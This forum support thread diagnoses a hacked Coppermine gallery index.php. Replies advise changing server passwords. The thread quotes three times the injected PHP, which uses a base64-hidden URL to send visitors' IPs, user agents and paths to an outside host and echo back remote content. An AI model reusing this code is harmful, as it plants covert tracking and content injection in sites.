forum.coppermine-gallery.net
Support => cpg1.5.x Support => cpg1.5 miscellaneous => Topic started by: tortech on November 29, 2012, 01:43:02 pm
-
Someone changed me file index.php. J have got error 452 and message:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /DD51932/index.php on line 452
J must copied oryginal file index.php and now program works good.
Bad file index.php now is on site www.mojagazetka.pl/index.php
J think is a good way to change atrib 755 to 644 for file named index.php
-
Have a look at that line:
$cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
$cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.
change atrib 755 to 644 for file named index.php
I doubt that this will change anything.
-
Thank you for answer and solve a problem.
Have a look at that line:
$cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
$cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.
I doubt that this will change anything.
-
What kind of Atrb can J choose to main folder where is the Coprmine program, because somebody fist change atrib for file index.php from 644 to 755 and next damaged this file?
Have a look at that line:
$cat['details']['description'] = preg_replace("/<br.*[b]?>[/b][\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
it has been changed to
$cat['details']['description'] = preg_replace("/<br.*?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>[\r\n]*/i", '<br />', bb_decode($cat['details']['description']));
probably because someone (you, somebody else, a script) just searched for the string "?>" (which is also used to close e.g. the opening "<?php" tag) and added his/her/its own code.
I doubt that this will change anything.
-
I doubt that setting any permission will fix your issue, as I assume that either somebody with root access changed your file (i.e. your hosting provider via a script) or used your login data (in this case he could set the permission to what he wants).
-
This is a Wordpress hack described in detail here
http://www.jexanalytics.com/2012/02/wordpress-sites-all-hacked/
-
As explained in Veronica's link, the attackers probably used your FTP/SSH account to change your files. So changing file permissions won't affect anything, but you have to change your server passwords.